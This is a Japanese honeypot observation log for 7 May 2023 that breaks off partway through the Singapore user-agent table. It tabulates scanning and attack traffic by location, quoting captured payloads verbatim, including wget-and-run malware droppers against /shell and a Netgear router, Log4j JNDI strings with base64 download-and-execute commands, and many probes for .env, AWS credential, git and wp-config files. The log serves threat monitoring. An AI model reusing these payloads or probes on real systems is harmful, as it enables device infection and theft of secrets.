ハニーポット(仮) 観測記録 2023/05/07分です。
特徴
共通
GPONルータの脆弱性を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
zgrabによるスキャン行為
/.envへのスキャン行為
Location:JP
Apache Log4j2の脆弱性(CVE-2021-44228)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
aiohttpによるスキャン行為
.jsへのスキャン行為
/.awsへのスキャン行為
/.gitへのスキャン行為
WordPressへのスキャン行為
UserAgentがHello, Worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 109.205.213.3/bins/UnHAnaAW.arm4; chmod 777 /tmp/UnHAnaAW.arm4; sh /tmp/UnHAnaAW.arm4
Location:US
D-link製品の脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
CensysInspectによるスキャン行為
Nmap Scripting Engineによるスキャン行為
TurnitinBotによるスキャン行為
phpMyAdminへのスキャン行為
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 109.205.213.3/bins/UnHAnaAW.arm; chmod 777 /tmp/UnHAnaAW.arm; sh /tmp/UnHAnaAW.arm
Location:UK
D-link製品の脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
CensysInspectによるスキャン行為
WordPress Pluginへのスキャン行為
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 109.205.213.3/bins/UnHAnaAW.arm4; chmod 777 /tmp/UnHAnaAW.arm4; sh /tmp/UnHAnaAW.arm4
Location:SG
D-link製品の脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
CensysInspectによるスキャン行為
Nmap Scripting Engineによるスキャン行為
UserAgentがHello, Worldであるアクセス
を確認しました。
他
アクセス数推移
JP:総アクセス数:242 (前日比:115)
US:総アクセス数:86 (前日比:1)
UK:総アクセス数:74 (前日比:-1)
SG:総アクセス数:134 (前日比:-149)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 3.16.165.53 | United States |
1 | 3.235.245.114 | United States |
1 | 4.231.206.188 | United States |
1 | 18.184.218.162 | United States |
3 | 20.201.120.35 | United States |
1 | 34.219.166.20 | United States |
1 | 35.81.163.43 | United States |
3 | 43.128.79.158 | Singapore |
19 | 43.154.141.71 | Singapore |
1 | 45.56.108.128 | United States |
1 | 45.79.181.179 | United States |
2 | 45.79.181.223 | United States |
1 | 49.143.32.6 | South Korea |
2 | 54.203.68.15 | United States |
145 | 54.254.198.117 | United States |
2 | 63.214.171.26 | United States |
1 | 64.62.197.212 | United States |
1 | 64.62.197.222 | United States |
1 | 66.175.213.4 | United States |
2 | 67.129.123.70 | United States |
2 | 80.76.51.246 | Bulgaria |
2 | 87.121.221.49 | Bulgaria |
2 | 93.160.62.190 | Denmark |
1 | 104.192.0.50 | United States |
1 | 107.172.233.156 | United States |
1 | 109.205.213.38 | Azerbaijan |
2 | 109.237.98.226 | Russia |
1 | 117.215.252.187 | India |
1 | 124.239.133.128 | China |
1 | 134.122.133.97 | Singapore |
8 | 135.125.217.54 | France |
8 | 135.125.246.189 | France |
1 | 157.122.175.111 | China |
1 | 159.203.224.11 | United States |
2 | 172.104.11.4 | United States |
2 | 172.104.11.51 | United States |
1 | 172.105.128.11 | United States |
1 | 181.214.242.56 | United States |
2 | 185.32.164.145 | Russia |
1 | 185.254.196.173 | Ukraine |
1 | 185.254.196.186 | Ukraine |
2 | 188.119.51.126 | Turkey |
1 | 192.155.90.220 | United States |
1 | 192.241.225.21 | United States |
1 | 193.35.18.251 | Bulgaria |
1 | 198.199.101.132 | United States |
1 | 205.210.31.37 | United States |
2 | 209.201.15.190 | United States |
1 | 212.224.93.194 | Germany |
UserAgent一覧
件数 | UserAgent |
---|---|
15 | - |
1 | Go-http-client/1.1 |
1 | Hello, World |
2 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.82 Safari/537.36 OPR/29.0.1795.41 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 |
1 | Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.2 (KHTML, like Gecko) Safari/85.8 |
19 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; rv:108.0) Gecko/20100101 Firefox/108.0 |
1 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36 |
181 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
3 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
1 | Mozilla/5.0 (compatible; Konqueror/4.5; Windows) KHTML/4.5.4 (like Gecko) |
1 | Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 |
2 | Mozilla/5.0 zgrab/0.x |
1 | Mozilla/5.0 |
2 | Python-urllib/3.10 |
1 | Python/3.7 aiohttp/3.7.4.post0 |
1 | python-requests/2.25.1 |
1 | t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//104[.]248[.]62[.]142:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IHdnZXQgaHR0cDovLzEwNC4yNDguNjIuMTQyL2JpbnMuc2g7IGNobW9kIDc3NyBiaW5zLnNoOyBzaCBiaW5zLnNoOyB0ZnRwIDEwNC4yNDguNjIuMTQyIC1jIGdldCB0ZnRwMS5zaDsgY2htb2QgNzc3IHRmdHAxLnNoOyBzaCB0ZnRwMS5zaDsgdGZ0cCAtciB0ZnRwMi5zaCAtZyAxMDQuMjQ4LjYyLjE0MjsgY2htb2QgNzc3IHRmdHAyLnNoOyBzaCB0ZnRwMi5zaDsgZnRwZ2V0IC12IC11IGFub255bW91cyAtcCBhbm9ueW1vdXMgLVAgMjEgMTA0LjI0OC42Mi4xNDIgZnRwMS5zaCBmdHAxLnNoOyBzaCBmdHAxLnNoIHRmdHAxLnNoIHRmdHAyLnNoIGZ0cDEuc2g7IHJtIC1yZiAq}') |
2 | t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//167[.]99[.]144[.]56:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IHdnZXQgaHR0cDovLzE2Ny45OS4xNDQuNTYvc2tpZC5zaDsgY2htb2QgNzc3IHNraWQuc2g7IHNoIHNraWQuc2g7IHRmdHAgMTY3Ljk5LjE0NC41NiAtYyBnZXQgdGZ0cDEuc2g7IGNobW9kIDc3NyB0ZnRwMS5zaDsgc2ggdGZ0cDEuc2g7IHRmdHAgLXIgdGZ0cDIuc2ggLWcgMTY3Ljk5LjE0NC41NjsgY2htb2QgNzc3IHRmdHAyLnNoOyBzaCB0ZnRwMi5zaDsgcm0gLXJmICo=}') |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | MGLNDD_18.179.20.5_80\n |
||
1 | \x16\x03\x01\x01H\x01 |
||
11 | \x16\x03\x01 |
||
1 | GET | /.aws/credentials |
HTTP/1.1 |
1 | GET | /.docker/.env |
HTTP/1.1 |
1 | GET | /.docker/laravel/app/.env |
HTTP/1.1 |
1 | GET | /.env.backup |
HTTP/1.1 |
1 | GET | /.env.dev |
HTTP/1.1 |
1 | GET | /.env.dist |
HTTP/1.1 |
1 | GET | /.env.example |
HTTP/1.1 |
1 | GET | /.env.local |
HTTP/1.1 |
1 | GET | /.env.save |
HTTP/1.1 |
1 | GET | /.env.stage |
HTTP/1.1 |
1 | GET | /.env.www |
HTTP/1.1 |
1 | GET | /.env_1 |
HTTP/1.1 |
26 | GET | /.env |
HTTP/1.1 |
1 | GET | /.envs |
HTTP/1.1 |
1 | GET | /.env~ |
HTTP/1.1 |
2 | GET | /.git/HEAD |
HTTP/1.1 |
1 | GET | /.git/config |
HTTP/1.1 |
1 | GET | /.gitlab-ci/.env |
HTTP/1.1 |
2 | GET | /.hg/hgrc |
HTTP/1.1 |
1 | GET | /.s3cfg |
HTTP/1.1 |
1 | GET | /.vscode/.env |
HTTP/1.1 |
1 | GET | /.wp-config.php.swp |
HTTP/1.1 |
1 | GET | /:80:undefined?id= |
HTTP/1.1 |
2 | GET | /:undefined?id= |
HTTP/1.1 |
1 | GET | /_phpinfo.php |
HTTP/1.1 |
4 | GET | /_profiler/phpinfo |
HTTP/1.1 |
1 | GET | /actuator/health |
HTTP/1.1 |
1 | GET | /admin-app/.env |
HTTP/1.1 |
1 | GET | /admin/.env |
HTTP/1.1 |
1 | GET | /admin/dashboard/info.php |
HTTP/1.1 |
1 | GET | /admin/phpinfo.php |
HTTP/1.1 |
1 | GET | /alpha/.env |
HTTP/1.1 |
1 | GET | /api/.env |
HTTP/1.1 |
1 | GET | /api/phpinfo.php |
HTTP/1.1 |
1 | GET | /api/src/.env |
HTTP/1.1 |
1 | GET | /api/src |
HTTP/1.1 |
1 | GET | /apis/.env |
HTTP/1.1 |
1 | GET | /app/.env |
HTTP/1.1 |
1 | GET | /app/config/.env |
HTTP/1.1 |
1 | GET | /app/config/dev/.env |
HTTP/1.1 |
1 | GET | /apps/.env |
HTTP/1.1 |
1 | GET | /assets/.env |
HTTP/1.1 |
1 | GET | /back/.env |
HTTP/1.1 |
1 | GET | /backend/.env |
HTTP/1.1 |
1 | GET | /beta/.env |
HTTP/1.1 |
1 | GET | /blog/.env |
HTTP/1.1 |
1 | GET | /bootstrap/.env |
HTTP/1.1 |
1 | GET | /cdn-cgi/trace |
HTTP/1.1 |
1 | GET | /cgi-bin/.env |
HTTP/1.1 |
1 | GET | /check.php |
HTTP/1.1 |
1 | GET | /client/.env |
HTTP/1.1 |
1 | GET | /config.env |
HTTP/1.1 |
1 | GET | /config.js |
HTTP/1.1 |
1 | GET | /config.json |
HTTP/1.1 |
1 | GET | /config/.env |
HTTP/1.1 |
1 | GET | /configuration.php |
HTTP/1.1 |
1 | GET | /content/.env |
HTTP/1.1 |
1 | GET | /core/.env |
HTTP/1.1 |
1 | GET | /cp/.env |
HTTP/1.1 |
1 | GET | /crm/.env.production |
HTTP/1.1 |
1 | GET | /d/.env |
HTTP/1.1 |
1 | GET | /dashboard/phpinfo.php |
HTTP/1.1 |
1 | GET | /dashboard/test.php |
HTTP/1.1 |
1 | GET | /database/.env |
HTTP/1.1 |
1 | GET | /debug/default |
HTTP/1.1 |
1 | GET | /demo/.env |
HTTP/1.1 |
1 | GET | /dev/.env |
HTTP/1.1 |
1 | GET | /develop/info.php |
HTTP/1.1 |
1 | GET | /development/.env |
HTTP/1.1 |
1 | GET | /docs/.env |
HTTP/1.1 |
1 | GET | /download/.env |
HTTP/1.1 |
1 | GET | /en/.env |
HTTP/1.1 |
1 | GET | /env/.env |
HTTP/1.1 |
1 | GET | /environment |
HTTP/1.1 |
1 | GET | /envrc |
HTTP/1.1 |
1 | GET | /export/.env |
HTTP/1.1 |
2 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /files/.env |
HTTP/1.1 |
1 | GET | /frontend_dev.php/$ |
HTTP/1.1 |
1 | GET | /geoserver/web/ |
HTTP/1.1 |
1 | GET | /home/.env |
HTTP/1.1 |
1 | GET | /hudson |
HTTP/1.1 |
1 | GET | /i.php |
HTTP/1.1 |
1 | GET | /icons/.env |
HTTP/1.1 |
1 | GET | /images/.env |
HTTP/1.1 |
1 | GET | /img/.env |
HTTP/1.1 |
1 | GET | /index.js |
HTTP/1.1 |
1 | GET | /index.php |
HTTP/1.1 |
2 | GET | /info.php |
HTTP/1.1 |
1 | GET | /info/phpinfo.php |
HTTP/1.1 |
1 | GET | /info1.php |
HTTP/1.1 |
1 | GET | /kyc/.env |
HTTP/1.1 |
1 | GET | /laravel/.env |
HTTP/1.1 |
1 | GET | /laravel/core/.env |
HTTP/1.1 |
1 | GET | /lib/.env |
HTTP/1.1 |
1 | GET | /live/.env.staging |
HTTP/1.1 |
1 | GET | /local-phpinfo.php |
HTTP/1.1 |
1 | GET | /local/.env |
HTTP/1.1 |
1 | GET | /login/.env |
HTTP/1.1 |
1 | GET | /mailer/.env |
HTTP/1.1 |
1 | GET | /manual/.env |
HTTP/1.1 |
1 | GET | /media/.env |
HTTP/1.1 |
1 | GET | /old/.env |
HTTP/1.1 |
1 | GET | /p.php |
HTTP/1.1 |
1 | GET | /php-info.php |
HTTP/1.1 |
1 | GET | /php-info |
HTTP/1.1 |
1 | GET | /php.ini |
HTTP/1.1 |
1 | GET | /php.php |
HTTP/1.1 |
1 | GET | /php/phpinfo.php |
HTTP/1.1 |
1 | GET | /php_info.php |
HTTP/1.1 |
1 | GET | /phpinfo.php |
HTTP/1.1 |
1 | GET | /phpinfo/phpinfo.php |
HTTP/1.1 |
1 | GET | /phpinfo |
HTTP/1.1 |
1 | GET | /phptest.php |
HTTP/1.1 |
1 | GET | /pi.php |
HTTP/1.1 |
1 | GET | /private/.env |
HTTP/1.1 |
1 | GET | /prod/.env |
HTTP/1.1 |
2 | GET | /public/.env |
HTTP/1.1 |
1 | GET | /results/.env |
HTTP/1.1 |
1 | GET | /root/infophp |
HTTP/1.1 |
1 | GET | /script/.env |
HTTP/1.1 |
1 | GET | /scripts/.env |
HTTP/1.1 |
1 | GET | /server/.env |
HTTP/1.1 |
1 | GET | /server/phpinfo.php |
HTTP/1.1 |
1 | GET | /services/.env |
HTTP/1.1 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//117[.]215[.]252[.]187:48250/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 |
HTTP/1.0 |
2 | GET | /shared/.env |
HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.213.3/bins/UnHAnaAW.arm4;chmod+777+/tmp/UnHAnaAW.arm4;sh+/tmp/UnHAnaAW.arm4 |
|
1 | GET | /site/.env |
HTTP/1.1 |
1 | GET | /src/.env |
HTTP/1.1 |
1 | GET | /staging/.env |
HTTP/1.1 |
1 | GET | /static/.env |
HTTP/1.1 |
1 | GET | /storage/.env |
HTTP/1.1 |
1 | GET | /system/.env |
HTTP/1.1 |
1 | GET | /systembc/password.php |
HTTP/1.0 |
1 | GET | /temp.php |
HTTP/1.1 |
1 | GET | /test.php |
HTTP/1.1 |
1 | GET | /test/.env |
HTTP/1.1 |
1 | GET | /test1.php |
HTTP/1.1 |
1 | GET | /test2.php |
HTTP/1.1 |
1 | GET | /testing.php |
HTTP/1.1 |
1 | GET | /testphpinfo |
HTTP/1.1 |
1 | GET | /tools/info.php |
HTTP/1.1 |
2 | GET | /uploads/.env |
HTTP/1.1 |
1 | GET | /v2/.env |
HTTP/1.1 |
1 | GET | /v3/time |
HTTP/1.1 |
1 | GET | /vod/3383.html |
HTTP/1.1 |
1 | GET | /web/.env |
HTTP/1.1 |
1 | GET | /website/.env |
HTTP/1.1 |
1 | GET | /wp-config.backup |
HTTP/1.1 |
1 | GET | /wp-config.bak |
HTTP/1.1 |
1 | GET | /wp-config.orig |
HTTP/1.1 |
1 | GET | /wp-config.php. |
HTTP/1.1 |
1 | GET | /wp-config.php.bak |
HTTP/1.1 |
1 | GET | /wp-config.php.bk |
HTTP/1.1 |
1 | GET | /wp-config.php.orig |
HTTP/1.1 |
1 | GET | /wp-config.php.save |
HTTP/1.1 |
1 | GET | /wp-config.php_ |
HTTP/1.1 |
1 | GET | /wp-config.php_bk |
HTTP/1.1 |
1 | GET | /wp-config.php_old |
HTTP/1.1 |
1 | GET | /wp-config.php_orig |
HTTP/1.1 |
1 | GET | /wp-config.php |
HTTP/1.1 |
1 | GET | /wp-config.php~ |
HTTP/1.1 |
1 | GET | /yuuki?pp=env |
HTTP/1.1 |
19 | HEAD | /Core/Skin/Login.aspx |
HTTP/1.1 |
1 | POST | /GponForm/diag_Form?images/ |
HTTP/1.1 |
3 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
1 | POST | /cgi-bin |
HTTP/1.1 |
1 | POST | /database |
HTTP/1.1 |
1 | POST | /old |
HTTP/1.1 |
1 | POST | /public |
HTTP/1.1 |
1 | POST | /shared |
HTTP/1.1 |
1 | POST | /uploads |
HTTP/1.1 |
Location:US
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 34.219.166.20 | United States |
1 | 35.81.163.43 | United States |
1 | 38.91.106.78 | United States |
1 | 45.33.80.243 | United States |
1 | 45.79.181.94 | United States |
1 | 45.79.181.223 | United States |
1 | 45.79.181.251 | United States |
2 | 45.227.254.48 | Belize |
1 | 51.158.37.186 | France |
24 | 54.37.79.75 | France |
1 | 87.121.221.49 | Bulgaria |
6 | 95.214.27.204 | Bulgaria |
1 | 103.187.191.128 | private ip address |
1 | 103.187.191.164 | private ip address |
1 | 103.187.191.165 | private ip address |
1 | 103.187.191.183 | private ip address |
1 | 107.170.208.7 | United States |
1 | 107.175.65.133 | United States |
1 | 109.205.213.41 | Azerbaijan |
2 | 152.89.196.144 | Russia |
2 | 167.94.138.124 | United States |
2 | 167.94.146.58 | United States |
3 | 172.104.11.4 | United States |
1 | 172.104.11.46 | United States |
1 | 172.105.128.11 | United States |
1 | 172.105.128.13 | United States |
1 | 179.43.177.243 | Panama |
2 | 184.105.247.194 | United States |
2 | 192.155.90.220 | United States |
1 | 192.241.193.13 | United States |
1 | 192.241.198.51 | United States |
1 | 193.35.18.61 | Bulgaria |
3 | 193.35.18.65 | Bulgaria |
2 | 193.35.18.125 | Bulgaria |
2 | 193.35.18.251 | Bulgaria |
1 | 193.203.203.71 | Moldova |
1 | 198.199.118.130 | United States |
1 | 198.235.24.5 | United States |
1 | 205.210.31.28 | United States |
1 | 209.97.164.8 | United States |
5 | 212.224.93.195 | Germany |
1 | 219.78.91.237 | Hong Kong |
UserAgent一覧
件数 | UserAgent |
---|---|
27 | - |
4 | Mozila/5.0 |
1 | Mozilla/4.0 (PSP (PlayStation Portable); 2.00) |
1 | Mozilla/5.0 (Linux; U; Android 1.5; de-de; HTC Magic Build/PLAT-RC33) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 FirePHP/0.3 |
1 | Mozilla/5.0 (Linux; U; Android 10; zh-Hans-CN; SPN-AL00 Build/HUAWEISPN-AL00) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.108 Quark/5.4.9.201 Mobile Safari/537.36 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4889.0 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0 |
1 | Mozilla/5.0 (Windows NT 10.0; rv:110.0) Gecko/20100101 Firefox/110.0 |
27 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
1 | Mozilla/5.0 (X11; Linux x86_64; rv:104.0) Gecko/20100101 Firefox/104.0 |
1 | Mozilla/5.0 (X11; U; SunOS sun4m; en-US; rv:1.4b) Gecko/20030517 Mozilla Firebird/0.6 |
7 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
2 | Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/) |
4 | Mozilla/5.0 (compatible; Nmap Scripting Engine; https[:]//nmap[.]org/book/nse.html) |
3 | Mozilla/5.0 zgrab/0.x |
1 | TurnitinBot (https[:]//turnitin[.]com/robot/crawlerinfo.html) |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | MGLNDD_34.68.118.83_80\n |
||
2 | \x03 |
||
14 | \x16\x03\x01 |
||
28 | GET | /.env |
HTTP/1.1 |
2 | GET | /.hg/hgrc |
HTTP/1.1 |
1 | GET | //MyAdmin/scripts/setup.php |
HTTP/1.1 |
1 | GET | //myadmin/scripts/setup.php |
HTTP/1.1 |
1 | GET | //phpMyAdmin/scripts/setup.php |
HTTP/1.1 |
1 | GET | //phpmyadmin/scripts/setup.php |
HTTP/1.1 |
1 | GET | //pma/scripts/setup.php |
HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
1 | GET | /HNAP1 |
HTTP/1.1 |
1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
1 | GET | /actuator/health |
HTTP/1.1 |
2 | GET | /docker-compose.yml |
HTTP/1.1 |
1 | GET | /evox/about |
HTTP/1.1 |
4 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /geoserver/web/ |
HTTP/1.1 |
1 | GET | /hudson |
HTTP/1.1 |
1 | GET | /info.php |
HTTP/1.1 |
1 | GET | /muieblackcat |
HTTP/1.1 |
1 | GET | /nmaplowercheck1683332244 |
HTTP/1.1 |
1 | GET | /portal/redlion |
HTTP/1.1 |
1 | GET | /sendgrid.env |
HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.213.3/bins/UnHAnaAW.arm;chmod+777+/tmp/UnHAnaAW.arm;sh+/tmp/UnHAnaAW.arm |
|
4 | POST | /HNAP1/ |
HTTP/1.1 |
1 | POST | /HNAP1/ |
HTTP/1.0 |
7 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
1 | POST | /sdk |
HTTP/1.1 |
2 | PRI | * |
HTTP/2.0 |
Location:UK
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 38.91.106.78 | United States |
1 | 43.130.126.24 | Singapore |
1 | 45.79.181.94 | United States |
1 | 45.79.181.104 | United States |
1 | 45.79.181.179 | United States |
2 | 45.79.181.223 | United States |
1 | 45.79.181.251 | United States |
1 | 45.88.66.48 | Bulgaria |
1 | 45.227.254.55 | Belize |
28 | 51.79.29.48 | Canada |
1 | 64.62.197.167 | United States |
1 | 64.62.197.175 | United States |
1 | 66.240.192.82 | United States |
1 | 87.121.221.49 | Bulgaria |
1 | 109.205.213.39 | Azerbaijan |
7 | 139.59.36.249 | Singapore |
2 | 152.89.196.144 | Russia |
2 | 162.142.125.223 | United States |
1 | 162.243.136.24 | United States |
1 | 162.243.145.8 | United States |
2 | 167.248.133.124 | United States |
1 | 172.104.11.4 | United States |
1 | 172.104.11.34 | United States |
1 | 172.104.11.46 | United States |
1 | 172.104.242.173 | United States |
1 | 172.105.128.13 | United States |
1 | 183.136.225.32 | China |
2 | 192.155.90.118 | United States |
1 | 192.241.215.17 | United States |
1 | 193.35.18.61 | Bulgaria |
1 | 193.35.18.65 | Bulgaria |
1 | 193.35.18.251 | Bulgaria |
1 | 194.165.16.76 | Panama |
1 | 198.199.97.153 | United States |
1 | 198.235.24.195 | United States |
1 | 205.210.31.144 | United States |
UserAgent一覧
件数 | UserAgent |
---|---|
25 | - |
2 | Mozila/5.0 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 OPR/94.0.0.0 (Edition Yx GX) |
3 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE |
29 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
1 | Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0 |
3 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
2 | Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/) |
3 | Mozilla/5.0 zgrab/0.x |
1 | Mozilla/5.0 |
1 | python-requests/2.28.2 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | MGLNDD_132.145.66.34_80\n |
||
2 | \x03 |
||
18 | \x16\x03\x01 |
||
1 | \xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 |
X\xd4>\x12\x98\xc4<\xe0\x13\xcf | |
29 | GET | /.env |
HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
1 | GET | /actuator/health |
HTTP/1.1 |
1 | GET | /client/get_targets |
HTTP/1.1 |
5 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /geoip/ |
HTTP/1.1 |
1 | GET | /geoserver/web/ |
HTTP/1.1 |
1 | GET | /hudson |
HTTP/1.1 |
1 | GET | /portal/redlion |
HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.213.3/bins/UnHAnaAW.arm4;chmod+777+/tmp/UnHAnaAW.arm4;sh+/tmp/UnHAnaAW.arm4 |
|
1 | GET | /upl.php |
HTTP/1.1 |
1 | GET | /wp-content/plugins/wp-file-manager/readme.txt |
HTTP/1.1 |
2 | POST | /HNAP1/ |
HTTP/1.1 |
3 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
2 | PRI | * |
HTTP/2.0 |
Location:SG
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 1.81.195.184 | China |
2 | 4.1.229.86 | United States |
2 | 4.14.70.9 | United States |
2 | 4.17.224.131 | United States |
2 | 4.17.224.134 | United States |
1 | 4.154.83.105 | United States |
1 | 20.236.132.214 | United States |
1 | 27.74.240.14 | Vietnam |
1 | 43.130.126.24 | Singapore |
1 | 45.33.80.243 | United States |
1 | 45.55.0.11 | United States |
1 | 45.56.108.128 | United States |
1 | 45.79.172.21 | United States |
2 | 45.79.181.94 | United States |
1 | 45.79.181.223 | United States |
1 | 45.79.181.251 | United States |
1 | 45.227.254.8 | Belize |
27 | 54.37.79.75 | France |
1 | 60.29.208.118 | China |
2 | 63.214.171.26 | United States |
2 | 64.85.173.196 | United States |
2 | 68.66.164.26 | United States |
2 | 69.162.243.124 | United States |
2 | 69.194.182.221 | United States |
1 | 87.121.221.49 | Bulgaria |
4 | 103.60.60.186 | Singapore |
1 | 103.187.191.141 | private ip address |
1 | 103.187.191.147 | private ip address |
1 | 103.187.191.177 | private ip address |
1 | 103.187.191.193 | private ip address |
1 | 107.170.255.21 | United States |
3 | 115.78.10.124 | Vietnam |
4 | 117.7.131.77 | Vietnam |
1 | 117.84.207.23 | China |
1 | 134.122.133.58 | Singapore |
2 | 152.89.196.144 | Russia |
7 | 159.65.40.70 | United States |
1 | 159.203.208.19 | United States |
2 | 162.142.125.225 | United States |
1 | 172.104.11.34 | United States |
1 | 172.105.128.12 | United States |
3 | 172.105.128.13 | United States |
2 | 179.43.177.243 | Panama |
1 | 183.136.225.32 | China |
4 | 185.32.164.145 | Russia |
2 | 185.225.45.232 | United Kingdom |
6 | 188.119.51.126 | Turkey |
1 | 192.155.90.220 | United States |
1 | 192.241.207.91 | United States |
1 | 193.35.18.61 | Bulgaria |
1 | 193.35.18.65 | Bulgaria |
1 | 193.35.18.206 | Bulgaria |
2 | 193.35.18.251 | Bulgaria |
1 | 194.110.203.85 | private ip address |
2 | 202.73.34.226 | Singapore |
1 | 205.210.31.99 | United States |
1 | 205.210.31.131 | United States |
4 | 206.226.64.150 | United States |
4 | 212.154.7.246 | Turkey |
2 | 216.218.206.66 | United States |
1 | 218.72.215.45 | China |
UserAgent一覧
件数 | UserAgent |
